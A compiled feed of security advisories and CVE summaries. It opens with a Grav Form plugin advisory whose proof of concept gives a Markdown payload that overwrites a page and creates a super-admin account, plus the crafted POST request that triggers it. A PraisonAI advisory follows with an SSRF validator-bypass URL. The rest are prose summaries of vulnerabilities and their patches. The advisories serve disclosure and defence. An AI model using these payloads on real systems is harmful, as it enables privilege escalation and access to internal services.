### Summary (Tested on Form 9.0.3 released on April, 28th) The Form plugin's file upload handler at `user/plugins/form/classes/Form.php:583` accepts a POST-supplied `filename` parameter (`$filename = $post['filename'] ?? $upload['file']['name']`) that overrides the original uploaded filename. The override passes through `Utils::checkFilename()`, which blocks only a narrow extension list (`.php*`, `.htm*`, `.js`, `.exe`). Markdown (`.md`) is **not** blocked. A page's directory under `user/pages/` contains its `.md` content file (e.g. `default.md`, `form.md`). When a form's file upload field has `accept: ['*']` (or any policy that admits text files), an unauthenticated visitor can: 1. Upload **arbitrary content** with **`filename=form.md`** (or other page-content filenames), 2. Submit the form to trigger `Form::copyFiles()`, which **overwrites the page's own `.md` file**. ### Details **Vulnerable code path** `user/plugins/form/classes/Form.php:580-606` (in `uploadFiles()`): ```php $grav->fireEvent('onFormUploadSettings', new Event(['settings' => &$settings, 'post' => $post])); $upload = json_decode(json_encode($this->normalizeFiles($_FILES['data'], $settings->name)), true); $filename = $post['filename'] ?? $upload['file']['name']; // ← POST-controlled // ... if (!Utils::checkFilename($filename)) { // ← extension blocklist only return ['status' => 'error', 'message' => 'Bad filename']; } ``` `Utils::checkFilename()` (`system/src/Grav/Common/Utils.php:980`) blocks `..`, slashes, null bytes, leading/trailing dots, and the `uploads_dangerous_extensions` list. The default list contains: `php, php2-5, phar, phtml, html, htm, shtml, shtm, js, exe`. **`md` is not on the list**. The MIME check (lines 627-654) uses `Utils::getMimeByFilename($filename)` against the blueprint's `accept` list. With `accept: ['*']`, all filenames pass. After upload, the file is held in flash storage. When the form is submitted, `Form::copyFiles()` (`user/plugins/form/classes/Form.php:1041-1074`) calls `$upload->moveTo($destination)`: ```php $destination = $upload->getDestination(); // ← determined at upload time: // $destination = $page_dir . '/' . $filename $folder = $filesystem->dirname($destination); if (!is_dir($folder) && !@mkdir($folder, 0777, true) && !is_dir($folder)) { ... } $upload->moveTo($destination); ``` `moveTo()` does not check whether `$destination` is an existing protected file - if `form.md` (the page's own content) already exists at the destination, it is **overwritten**. A Grav page's `.md` file is parsed as YAML frontmatter + Markdown content. Whatever content the attacker uploaded becomes the new page definition. ### PoC **Setup** : Any existing page with a form like this - a "generic upload" form is the realistic case: ```yaml --- title: Upload your file form: name: upform fields: - {name: img, type: file, multiple: false, accept: ['*'], destination: 'self@'} - {name: notes, type: text} buttons: - {type: submit, value: Upload} process: - upload: true - display: thanks --- ``` 1. Atacker uploads a malicious md file that replaces the form's md file. Lets say the form is under the path `/upload`. ```yaml --- title: Pwned form: name: pwn fields: - {name: dummy, type: text} buttons: - {type: submit, value: Submit} process: - save: folder: '../accounts' filename: 'viaup.yaml' extension: yaml operation: create body: | state: enabled email: viaup@example.com fullname: Via Upload title: Admin access: admin: { login: true, super: true } site: { login: true } hashed_password: $2y$10$zGRm19Dk5ivMFZS5taMtU.O8WDUZpTqSsSg8JFs4SwOxJ/N6wl/Uq - display: thanks --- ``` (Hash above is bcrypt for `PwnPass123!`.) 2. Attacker accesses the new markdown file under the original path and loads the new markdown file `GET /upload`. 3. Attacker sends a form POST request to `/upload` and change the form_name to whatever the payload form name is. Keep in mind the nonce has to be valid. ``` POST /upload HTTP/1.1 ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="data[_json][img]" [] ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="data[notes]" ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="__form-name__" pwn ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="__unique_form_id__" 8r7q1iwdnnmcgkohlbtj ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="form-nonce" 4e9417f0c7e89d1ab4e0dbe136ec78bd ------geckoformboundary44d7ad8deb57480098493877a35ad715-- ``` 4. Login as a newly created super admin user. ### Impact Grav pages that allows user to uploads any file (besides the ones in the blocklist) with the default `self@` configuration is able to upload a malicious markdown file to overwrite the existing markdown file. In this case, unauthenticated users were able to escalate their privileges to super-admin. ### Remediation Block sensitive page-content filenames at upload In `user/plugins/form/classes/Form.php`, after `Utils::checkFilename()` succeeds, add a content-area-aware check: ```php // Block files that would overwrite Grav page content if uploaded into // a page directory. Page templates are .md (Markdown) and .yaml/.yml // (frontmatter overrides). Block both for safety. $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $pageContentExtensions = ['md', 'yaml', 'yml', 'json', 'twig']; if (in_array($ext, $pageContentExtensions, true)) { return [ 'status' => 'error', 'message' => 'File type not allowed for upload (page content files are blocked)', ]; } ``` Add `md, yaml, yml, json, twig, ini` to the global `security.uploads_dangerous_extensions` list - these all carry executable semantics in Grav's runtime even though they are not "PHP".
Authorization bypass in OpenClaw Matrix bot integration allows DM-paired attackers to execute privileged room control commands without configured permissions. Attackers who have previously established direct message pairing can exploit misaligned allowlist logic to run room control commands in bot rooms, bypassing room membership and allowlist requirements. Fixed in version 2026.4.15 after responsible disclosure by Keen Security Lab. No evidence of active exploitation; publicly available vendor advisory and fix commits reduce exploitation probability.
Cross-Site WebSocket Hijacking in DevSpace UI Server allows remote attackers to execute commands inside Kubernetes pods when developers visit malicious websites while DevSpace UI is running. The UI server's WebSocket endpoint at localhost:8090 accepts connections from any origin, enabling browser-based exploitation without authentication. DevSpace 6.3.20 and earlier are affected; version 6.3.21 contains the fix. No public exploit code identified at time of analysis, but exploitation technique is well-documented in WebSocket security research. The vulnerability enables attackers to stream pod logs, open interactive shells, and execute pipeline commands through the victim's active DevSpace session.
### Summary The URL checking logic in PraisonAI has a logical flaw that could be bypassed by attackers, leading to SSRF attacks. ### Details The current PraisonAI project uses _validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks. <img width="1290" height="1145" alt="QQ20260424-151256-24-1" src="https://github.com/user-attachments/assets/d5f16b74-5ad2-444f-8600-b05f78a4b769" /> However, there are indeed differences in parsing between urlparse and the library that actually sends the request. Currently, almost all application scenarios in this project involve first using _validate_url for URL validation, and then using _get_session().get to send the request. <img width="1143" height="740" alt="QQ20260424-151437-24-2" src="https://github.com/user-attachments/assets/b1bf6ec2-d32a-4dac-b814-da819e8d3c83" /> In reality, its underlying mechanism is requests.get. <img width="1042" height="576" alt="QQ20260424-151645-24-3" src="https://github.com/user-attachments/assets/e17352c3-4205-44d6-ab6e-75566480215b" /> The core issue: `urlparse()` and `requests` disagree on which host a URL like `http://127.0.0.1:6666\@1.1.1.1` points to: - `urlparse()` treats `\` as a regular character and `@` as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public) - `requests` treats `\` as a path character, connecting to `127.0.0.1` (internal) Below is a test code I wrote following the code. ``` import sys from pathlib import Path from pprint import pprint sys.path.insert(0, str(Path(r"D:/BaiduNetdiskDownload/PraisonAI-main/PraisonAI-main/src/praisonai-agents"))) from praisonaiagents.tools import spider_tools # url = "http://127.0.0.1:6666\@1.1.1.1" url = "http://127.0.0.1:6666" result = spider_tools.scrape_page(url) if isinstance(result, dict) and "error" in result: print("scrape failed:", result["error"]) else: pprint(result) ``` When an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it. <img width="1068" height="128" alt="QQ20260424-152007-24-4" src="https://github.com/user-attachments/assets/294bff10-2af6-4960-bf69-dbf3340b1e9b" /> However, when an attacker uses `http://127.0.0.1:6666\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack. <img width="2089" height="324" alt="QQ20260424-152123-24-5" src="https://github.com/user-attachments/assets/4421ce42-e47b-48de-a97a-56ce56a2bbc9" /> ### PoC ``` http://127.0.0.1:6666\@1.1.1.1 ``` ### Impact SSRF
Cisco SG350 and SG350X managed switches can be remotely crashed via crafted SNMP requests, forcing unexpected device reloads. Authenticated attackers with valid SNMP credentials (read-only or read-write community strings for SNMPv1/v2c, or user credentials for SNMPv3) can trigger a heap-based buffer overflow in SNMP response parsing. Cisco confirmed this vulnerability affects all three SNMP versions (v1, v2c, v3) and published advisory cisco-sa-sg350-snmp-dos-GEFZr2Tj. EPSS and KEV status not provided in available data; exploitation requires network access with low complexity but does require valid SNMP authentication.
Remote denial of service in React Server Components (react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack) versions 19.0.0-19.0.5, 19.1.0-19.1.6, and 19.2.0-19.2.5 allows unauthenticated remote attackers to crash servers, trigger out-of-memory exceptions, or exhaust CPU resources by sending specially crafted HTTP requests to server function endpoints. The CVSS 7.5 score reflects network-accessible, low-complexity exploitation requiring no privileges or user interaction, with high availability impact. No public exploit code or active exploitation confirmed at time of analysis, though EPSS data unavailable and vulnerability disclosed by Meta directly.
Remote unauthenticated attackers can trigger memory exhaustion and process-level denial of service in Node.js applications using basic-ftp by sending unterminated FTP multiline control responses during initial connection. The vulnerability occurs in the client library when connecting to malicious or compromised FTP servers, causing unbounded buffer growth in _partialResponse with repeated CPU-intensive reparsing. This affects automated FTP integrations for scheduled imports, customer-provided endpoints, backup jobs, and CI/CD pipelines. Publicly available exploit code exists per GitHub security advisory GHSA-rpmf-866q-6p89. CVSS 7.5 HIGH with network attack vector, low complexity, and no authentication required confirms practical remote exploitation risk.
Remote denial of service in Unisoc T8100/T9100/T8200/T8300 chipset NR modem implementations allows unauthenticated network attackers to crash device cellular connectivity via malformed protocol input. The improper input validation in the 5G New Radio modem stack enables trivial remote service disruption requiring no user interaction or authentication. EPSS data not available; no evidence of active exploitation (not in CISA KEV). Affects mobile devices using these specific Unisoc chipset models in 5G NR mode.
Remote code execution in Google Chrome's MediaRecording component (versions prior to 148.0.7778.96) allows attackers to execute arbitrary code when victims perform specific UI interactions with a malicious webpage. The use-after-free vulnerability in memory management has been patched by Google in version 148.0.7778.96. EPSS data not available; no CISA KEV listing identified, suggesting no confirmed widespread exploitation at time of analysis, though publicly available exploit code exists per Chromium bug tracker disclosure.
Remote code execution in Google Chrome for iOS prior to version 148.0.7778.96 through use-after-free memory corruption in the mobile UI handler. Exploitation requires convincing a user to perform specific UI gestures while viewing a malicious HTML page. Google confirms Critical severity and has released a patched version. EPSS data unavailable; not currently listed in CISA KEV. Attack complexity is rated High due to the required user interaction pattern, limiting opportunistic exploitation but enabling targeted attacks via social engineering.
Privilege escalation in Google Chrome's Cast component (versions prior to 148.0.7778.96) allows remote attackers to elevate from renderer to higher-privilege browser process via specially crafted HTML page after initial renderer compromise. Despite 7.5 CVSS score, Chromium security team rates this as Low severity, indicating limited real-world impact. Vendor patch released in version 148.0.7778.96. No public exploit identified at time of analysis.
Remote attackers can crash Unisoc chipset IMS (IP Multimedia Subsystem) implementations through network-accessible malformed input, causing complete denial of service with no authentication required. Affects 17 Unisoc chipset models (SC7731E, SC9832E, SC9863A, T-series T310 through T8300) used in mobile devices. CVSS 7.5 (High) reflects direct network exposure and ease of exploitation (AV:N/AC:L/PR:N), though impact is limited to availability. No public exploit code identified at time of analysis, and EPSS data not available for assessment.
Remote denial of service in Unisoc modem IMS implementation across 16 chipset families (SC7731E through T8300) allows unauthenticated network attackers to crash mobile device modem services via crafted IMS traffic. The improper input validation vulnerability (CVSS 7.5) enables high-impact availability attacks against millions of deployed Android smartphones and IoT devices using Unisoc chipsets. No public exploit identified at time of analysis, with EPSS data unavailable for this recently disclosed January 2025 vulnerability.
Remote denial of service in Unisoc modem IMS (IP Multimedia Subsystem) implementation allows unauthenticated network attackers to crash telephony services on affected chipsets through malformed input. Affects 16 Unisoc chipset models spanning SC and T series (SC7731E through T8300) used in budget and mid-range mobile devices. No public exploit identified at time of analysis. CVSS 7.5 (High) reflects network accessibility and service disruption potential, though EPSS data unavailable for risk prioritization.
Remote denial of service in Unisoc modem IMS stack allows network attackers to crash affected devices through malformed input without authentication. Affects 16 Unisoc chipset families (SC7731E, SC9832E, SC9863A, T-series T310 through T8300) used in mobile devices. No authentication, user interaction, or special configuration required (CVSS AV:N/AC:L/PR:N/UI:N). No public exploit code or CISA KEV listing identified at time of analysis, though EPSS data unavailable for risk quantification.
Remote denial of service in Unisoc Modem IMS stack allows unauthenticated network attackers to crash mobile devices through improper input validation. Affects 16 Unisoc chipset families (SC7731E through T8300) widely deployed in budget smartphones and IoT devices across global markets. No authentication, user interaction, or elevated privileges required for exploitation. EPSS data and KEV status not available; no public exploit identified at time of analysis.
Granian ASGI server suffers remote denial of service when unauthenticated attackers send malformed WebSocket upgrade requests containing non-ASCII bytes in the Sec-WebSocket-Protocol header, causing worker process termination. Each crafted request kills one worker process; sequential requests across all workers achieve complete service outage. The vulnerability exists in Granian's pre-application WebSocket scope construction (src/asgi/utils.rs), making application-layer defenses ineffective. Publicly available exploit code exists with complete proof-of-concept demonstrating the attack. Vendor-released patch 2.7.4 addresses the issue for affected versions 1.2.0 through 2.7.3.
CPU exhaustion in python-multipart allows remote unauthenticated attackers to cause denial of service through crafted multipart/form-data requests with unbounded header blocks. Applications using Starlette, FastAPI, or other ASGI frameworks that parse attacker-controlled file uploads are vulnerable to worker thread starvation and event-loop blocking. Vendor-released patch available in version 0.0.27, which enforces default limits on both header count and individual header size during multipart parsing.
Unauthenticated remote denial-of-service in Micronaut Framework 4.3.0–4.10.21 allows heap exhaustion via crafted Accept-Language headers. The TimeConverterRegistrar component caches DateTimeFormatter instances in an unbounded ConcurrentHashMap keyed by @Format pattern plus locale. Attackers exploit BCP 47 private-use extensions (e.g., en-x-0001, en-x-0002) to generate millions of unique cache entries, consuming 500+ MB per 100,000 requests until JVM crashes with OutOfMemoryError. Publicly available exploit code exists (PoC provided in advisory). EPSS score not yet available for this 2026 CVE. Affects all Micronaut HTTP servers using documented @Format temporal parameter binding—a first-class framework feature requiring no special configuration. Vendor-released patch: 4.10.22 fixes both this and sibling vulnerability GHSA-3rfq-4wpf-qqw3 in ResourceBundleMessageSource. Structurally identical to previously patched GHSA-2hcp-gjrf-7fhc but in different component.
Infinite loop denial-of-service in Snappier .NET library allows remote attackers to exhaust server resources with as few as 15 bytes of malformed Snappy-compressed data. The vulnerability affects the SnappyStream decompressor component when processing framed-format streams, causing an uncatchable busy-loop that cannot be interrupted via try/catch blocks. Publicly available exploit code exists (CVE researcher provided a working proof-of-concept). CVSS 7.5 with network vector and no authentication required indicates remotely exploitable attack surface in web applications processing compressed uploads or API payloads. No active exploitation confirmed at time of analysis, but the trivial exploit complexity (15-byte payload) makes this attractive for resource exhaustion attacks against .NET services using Snappier for decompression.
## Summary Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread. ## Affected versions All versions of 4.2.x `netty-transport-native-epoll` up to and including 4.2.12.Final ## Fixed in 4.2.13.Final (fix merged into the `4.2` branch via [#16689](https://github.com/netty/netty/pull/16689); release not yet cut as of 2026-04-25). ## Severity **Medium** - Denial of Service (resource exhaustion / CPU spin) **CWE:** CWE-772: Missing Release of Resource after Effective Lifetime ## Description When a TCP connection using Netty's epoll transport has `ALLOW_HALF_CLOSURE` enabled (or is in a half-closed state via the HTTP codec), and the remote peer: 1. Sends a FIN (half-close), causing the server to mark the input as shutdown, then 2. Sends a RST (e.g. by closing with `SO_LINGER=0`) the server-side channel is never closed. This happens because: - `epollOutReady()` is a no-op when there is no pending flush. - `epollInReady()` short-circuits via `shouldBreakEpollInReady()` because input is already marked as shutdown. - The `EPOLLERR`/`EPOLLHUP` error condition is therefore never processed, and `channelInactive` is never fired. Depending on the Netty version and configuration, this results in: - **Stale channels**: The connection is never closed or deregistered. An unauthenticated remote attacker can repeat the sequence to accumulate stale connections, exhausting file descriptors, memory, or connection-count limits. - **CPU busy-loop**: In code paths where `clearEpollIn0()` is not called during the `ChannelInputShutdownReadComplete` event, `epoll_wait` returns immediately on every iteration for the affected fd, causing 100% CPU utilization on the event loop thread and starving all other connections multiplexed on it. ## Mitigation - Upgrade to 4.2.13.Final when released (or build from the `4.2` branch at commit [`0ec3d97`](https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d)). - If upgrading is not immediately possible, configure idle timeouts on connections to limit the lifetime of stale channels. ## Resources - Issue: https://github.com/netty/netty/issues/16683 - Fix: https://github.com/netty/netty/pull/16689
FlightPHP Core's default error handler exposes full exception messages, stack traces, and absolute filesystem paths in HTTP 500 responses without any debug-mode gating. All versions before 3.18.1 leak internal application structure, vendor package names, and any secrets interpolated into exception messages to unauthenticated remote attackers. This information disclosure primes follow-on attacks like LFI and path traversal by revealing server paths and configuration file locations. Vendor-released patch in version 3.18.1 introduces a flight.debug setting (default false) that suppresses verbose output in production. CVSS 7.5 reflects network-accessible information disclosure with no privileges required.
Flight PHP micro-framework (< 3.18.1) silently converts GET requests into DELETE or PUT operations via unvalidated X-HTTP-Method-Override headers or _method query parameters, enabling trivial CSRF attacks against destructive endpoints. Attackers can trigger resource deletion using simple HTML image tags without JavaScript or user interaction. The vulnerability bypasses middleware filters that gate only POST/DELETE verbs, and creates CDN cache poisoning scenarios where cached GET responses reflect executed DELETE operations. Patch available in version 3.18.1 introducing opt-in method override control (flight.allow_method_override setting). No active exploitation confirmed at time of analysis; publicly available exploit code exists in GitHub advisory.
Credential exposure in HCL BigFix Service Management (SM) version 23 leaves credentials insufficiently protected for a brief window while the application communicates with an internal backend service, which an attacker who can capture that traffic could reuse to authenticate to the backend. The flaw was self-reported by HCL and carries a CVSS 7.5 (confidentiality-only) rating; there is no public exploit identified at time of analysis and EPSS is negligible (0.03%, 8th percentile). CISA's SSVC framing rates exploitation as none and the issue as not automatable, indicating low immediate urgency.
HTTP Request Smuggling in Gazelle (Perl web server) versions through 0.49 enables attackers to smuggle malicious requests through reverse proxies by exploiting incorrect header precedence. Gazelle violates RFC 7230 by prioritizing Content-Length over Transfer-Encoding: chunked when both headers are present, allowing desynchronization between front-end proxies and the backend server. SSVC framework indicates the vulnerability is automatable with partial technical impact, while CVSS 7.5 reflects network-accessible unauthenticated exploitation with high integrity impact. A vendor patch is available via CPANSec.
Denial of service in Linux kernel RDS networking module allows remote unauthenticated attackers to cause persistent network reconnection failures through improper bit flag handling. The vulnerability affects the Reliable Datagram Sockets (RDS) protocol implementation where canceling a reconnect worker without clearing the reconnect-pending bit causes a permanent stuck state, preventing legitimate network reconnections. Vendor patches available across multiple stable kernel versions (5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0). EPSS exploitation probability is very low (0.02%, 7th percentile), and no public exploit or active exploitation confirmed at time of analysis.
Denial of service in Linux kernel's RDS/TCP networking subsystem allows remote unauthenticated attackers to trigger connection state machine deadlock, causing persistent service unavailability. The vulnerability stems from improper state transition handling in RDS_CONN_ERROR conditions introduced by multipath changes, where connections can bypass normal shutdown procedures and become permanently stuck with queued shutdown workers. With CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) and EPSS probability of 0.02%, this represents a moderate-severity issue affecting network-facing systems using RDS protocol. Patches available across multiple stable kernel versions (5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0).
Use-after-free in Linux kernel fore200e ATM driver allows local attackers to achieve high-severity impacts during PCA-200E or SBA-200E adapter removal. When the device is detached, tx_tasklet or rx_tasklet may still be running and access already-freed memory in fore200e_tx_tasklet() or fore200e_rx_tasklet(), potentially leading to code execution, information disclosure, or denial of service. Patches available across stable kernel branches (5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0). EPSS score of 0.02% (7th percentile) indicates low observed exploitation probability. Not listed in CISA KEV. Identified through static analysis, suggesting no active in-the-wild exploitation at time of disclosure.
TCP connections through veth interfaces with XDP programs can enter a permanent deadlock state where sender and receiver sequence numbers desynchronize, causing all traffic to stall indefinitely. The vulnerability stems from improper error code handling in GSO (Generic Segmentation Offload) frame transmission when individual segments within a GSO super-frame fail - TCP interprets partial segment loss as complete frame loss, advancing receiver state without sender acknowledgment. Affects Linux kernel versions from 3.18 through 6.19.x with patches available across multiple stable branches (5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0). EPSS score of 0.02% indicates low observed exploitation probability, and no active exploitation (KEV) or public exploit code has been identified at time of analysis.
Information disclosure in Linux kernel's RNBD (RDMA Network Block Device) server component allows remote unauthenticated attackers to read uninitialized kernel memory through response buffers. The rnbd-srv module fails to zero response message buffers before transmission, leaking residual kernel data to network clients, particularly during protocol version mismatches. With CVSS 7.5 (High) and confirmed vendor patches across multiple stable branches (5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0), this represents a classic uninitialized memory vulnerability. EPSS exploitation probability is low (0.02%, 7th percentile) and no public exploit identified at time of analysis, but the network attack vector and lack of authentication requirements warrant prioritization for systems running RNBD server functionality.
Local privilege escalation in Google Chrome Chromoting (remote desktop component) allows authenticated Windows users to gain elevated system privileges through a race condition exploit triggered by a malicious file. Fixed in Chrome 148.0.7778.96. The vulnerability requires user interaction and high attack complexity (AC:H), limiting automated exploitation despite the 7.5 CVSS score. No public exploit identified at time of analysis, and not listed in CISA KEV.
Remote code execution in Google Chrome versions prior to 148.0.7778.96 via malicious extension exploitation of use-after-free in Views component. Successful exploitation requires convincing a user to install a crafted Chrome extension, after which the attacker can execute arbitrary code with Chrome's privileges. Google has released Chrome 148.0.7778.96 to address this vulnerability. No evidence of active exploitation (not listed in CISA KEV) or public proof-of-concept code identified at time of analysis. CVSS 7.5 severity driven by high attack complexity and required user interaction, which moderates real-world exploitation risk despite potential for full system compromise.
AMD IOMMU completion wait operations in the Linux kernel can trigger soft lockups under high load when strict mode is enabled (iommu.strict=1). The vulnerability stems from busy-waiting inside a spinlock with interrupts disabled, causing kernel responsiveness issues and potential denial of service on systems with AMD IOMMU hardware. Patches are available across multiple kernel stable branches (6.6.128, 6.12.75, 6.18.16, 6.19.6, 7.0). EPSS score is low (0.02%, 5th percentile) with no confirmed active exploitation or public POC identified at time of analysis.
Linux kernel's mlx5e driver allows local denial of service via kernel crash when IPsec event handling triggers illegal sleeping operations in atomic context. The mlx5e_ipsec_handle_event workqueue calls mlx5_query_mac_address() which invokes hardware command execution requiring sleep, causing a 'scheduling while atomic' bug that crashes the kernel. Affected versions include mainline 6.2+ and stable branches 6.12.x through 7.0. Patches available across all supported branches (6.12.75, 6.18.16, 6.19.6, 7.0). EPSS score of 0.02% indicates minimal exploitation probability; no active exploitation or public POC identified. CVSS 7.5 AV:N rating appears inconsistent with description indicating local kernel-level triggering conditions.
Null pointer dereference in Linux kernel ICMP probe handling crashes systems when IPv6 module is configured but not loaded. The icmp_build_probe() function fails to validate ERR_PTR(-EAFNOSUPPORT) from ipv6_stub->ipv6_dev_find(), passing the error pointer directly to dev_hold() and triggering immediate kernel panic. EPSS probability is low (0.02%, 5th percentile) and no active exploitation confirmed, but CVSS 7.5 High severity reflects trivial remote unauthenticated denial-of-service against vulnerable kernel configurations. Patches available across stable branches (6.6.136, 6.12.83, 6.18.24, 6.19.14, 7.0) with upstream commit identifiers confirmed.
Remote unauthenticated attackers can access restricted package resources in Apache Wicket 8.x through 10.x by crafting URLs that bypass PackageResourceGuard protections, leading to unauthorized information disclosure. The vulnerability affects Apache Wicket versions 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0. With CVSS 7.5 (High) but low EPSS (0.02%, 5th percentile), this represents a theoretical high-severity issue without evidence of active exploitation. SSVC assessment confirms no current exploitation, though the attack is automatable against default configurations.
A denial-of-service vulnerability in the Linux kernel's OpenVPN TCP stream processing (ovpn_tcp_recv) allows remote unauthenticated attackers to cause packet drops and potential system unavailability through header offset overflow and misaligned protocol headers when handling coalesced TCP packets. The vulnerability affects Linux kernel versions containing commit 11851cbd60ea (OpenVPN driver) through 6.19.6, 6.18.16, and 7.0, with patches available in stable branches. EPSS score of 0.02% (4th percentile) suggests low observed exploitation probability despite the network-accessible attack vector and high availability impact (CVSS 7.5).
Kernel panic or denial of service occurs in the NTFS filesystem driver when d_compare() operations block on memory allocation. Linux kernel versions from mainline commit 1da177e4c3f4 through 6.18.x, 6.19.x, and early 7.0 are affected. The vulnerability stems from improper use of __getname() within the d_compare() function which can block, violating kernel locking requirements and causing system instability under memory pressure. EPSS score of 0.02% (4th percentile) indicates low observed exploitation likelihood. Vendor patches available for versions 6.18.16, 6.19.6, and 7.0.
Null pointer dereference in Linux kernel Realtek rtw89 WiFi PCI driver allows adjacent network attackers to trigger kernel crashes via malformed TX release reports with abnormal sequence numbers. The vulnerability causes out-of-bounds array access in wd_ring->pages when hardware reports invalid sequence numbers during wireless transmission operations. Vendor-released patches are available for kernel versions 6.18.16, 6.19.6, and 7.0. EPSS score of 0.02% (4th percentile) indicates minimal observed exploitation activity, though the CVSS vector (AV:A/AC:H/PR:N/UI:N) shows adjacent network access with high attack complexity enables complete system compromise without authentication.
Null pointer dereference in Linux kernel UDP-Lite implementation crashes systems when udp_lib_init_sock() fails during socket initialization. Affects mainline 6.18+ through 6.19.5 and stable 7.0. Remote unauthenticated attackers can trigger denial of service by sending crafted UDP-Lite packets that exploit unhandled initialization errors in udplite_sk_init() and udplitev6_sk_init(), causing NULL pointer access in __udp_enqueue_schedule_skb(). Vendor patches available for 6.18.16, 6.19.6, and 7.0 stable trees. EPSS score of 0.02% indicates low observed exploitation probability, and no active exploitation is confirmed at time of analysis.
NULL pointer dereferences in Linux kernel's IPv6 IOAM (In-situ Operations, Administration, and Maintenance) trace data handling cause denial of service when network packets trigger the vulnerable code path. Affects Linux kernel 5.15 through 6.19.14 and mainline branches. Despite CVSS 7.5 High severity with network vector and no authentication, EPSS exploitation probability is very low (0.02%, 4th percentile), and no active exploitation or public POC is identified at time of analysis. Vendor patches available via stable kernel commits.
### Summary Nerdbank.MessagePack contains an uncontrolled stack allocation vulnerability in DateTime decoding. A malicious MessagePack payload can declare an oversized timestamp extension length, causing the reader to allocate an attacker-controlled number of bytes on the stack. This can trigger a `StackOverflowException`, which is not catchable by user code and terminates the process. ### Impact Applications are impacted if they deserialize MessagePack data from untrusted or attacker-controlled sources using Nerdbank.MessagePack and the target type contains a `DateTime` value. A small malicious payload can cause process termination, resulting in a denial of service. This may affect services, APIs, workers, message consumers, or other long-running processes that deserialize untrusted MessagePack input. The issue occurs because DateTime timestamp extension decoding derives `tokenSize` from the attacker-controlled extension length before validating that the timestamp length is one of the legal MessagePack timestamp sizes: 4, 8, or 12 bytes. When the buffer is incomplete, that unvalidated size is propagated to the streaming reader slow path, where it is used in a `stackalloc`. ### Patches The 1.1.62 version contains the fix for this security vulnerability. ### Workarounds If upgrading is not yet possible, avoid deserializing untrusted MessagePack payloads into type graphs that may contain `DateTime` fields or properties. Input byte-size limits alone may not fully mitigate this issue, because the malicious payload can be small while declaring a very large extension length. Possible mitigations include: - Pre-validating MessagePack extension headers before deserialization and rejecting timestamp extensions whose length is not 4, 8, or 12 bytes. - Rejecting or filtering extension type `-1` timestamp values from untrusted input unless they are known to be valid. - Running deserialization of untrusted payloads in an isolated process that can be safely restarted after termination. - Restricting MessagePack deserialization to trusted producers until a patched version is available. ### Resources - CWE-789: Uncontrolled Memory Allocation: https://cwe.mitre.org/data/definitions/789.html - MessagePack timestamp extension specification: https://github.com/msgpack/msgpack/blob/master/spec.md#timestamp-extension-type
Denial of service in Cisco Crosswork Network Controller (CNC) and Cisco Network Services Orchestrator (NSO) allows remote unauthenticated attackers to exhaust connection resources by flooding the system with connection requests, forcing a manual reboot to restore service. CVSS 7.5 (High) with network vector and no authentication required. No public exploit code identified at time of analysis, and EPSS data not available. The vulnerability stems from inadequate rate-limiting on incoming connections (CWE-400), affecting critical network orchestration infrastructure used for automation and service provisioning.
SQL injection in Gravity Bookings Premium for WordPress (≤2.5.9) allows unauthenticated remote attackers to extract sensitive database information including user credentials, customer data, and booking records. The vulnerability requires no authentication (CVSS PR:N) and has low attack complexity, enabling widespread exploitation. Reported by Wordfence security research; no CISA KEV listing or public exploit code identified at time of analysis, but the trivial exploitation requirements (network accessible, no auth, no user interaction) make this a high-priority patching target for WordPress sites using this booking plugin.
Stored cross-site scripting (XSS) in Zabbix 6.0-7.4 allows authenticated attackers with high privileges to inject malicious JavaScript via monitored host data that executes when other users view dashboards containing Item history widgets (7.0+) or Plain text widgets (6.0). The attack requires the attacker to control a monitored host and the victim to open a dashboard with HTML display enabled in the affected widget. CVSS 7.3 reflects high impact but requires specific preconditions: high-privilege access (PR:H), user interaction (UI:P), and precise attack timing (AT:P). No CISA KEV listing or public exploit identified at time of analysis, with low immediate exploitation risk given the privilege requirements.
Stored Cross-Site Scripting (XSS) in Zabbix 7.0.x and 7.4.x allows authenticated administrators with non-super privileges to inject JavaScript payloads into maintenance period configurations. The malicious code executes when any user, including super admins, hovers over the affected maintenance period in the Host navigator widget tooltip, enabling session hijacking, credential theft, or unauthorized administrative actions with the victim's elevated privileges. Attack complexity is low and requires only user interaction (hovering), though exploit execution depends on victim access patterns. No public exploit code or active exploitation confirmed at time of analysis.
Privilege escalation in WatchGuard Agent for Windows allows authenticated local users to gain NT AUTHORITY\SYSTEM privileges via incorrect permissions in the patch management component. CVSS 7.3 with low attack complexity and local attack vector. No active exploitation or public exploit code identified at time of analysis. EPSS data not available - real-world risk depends on defender endpoint deployment environments where local user access is already established.
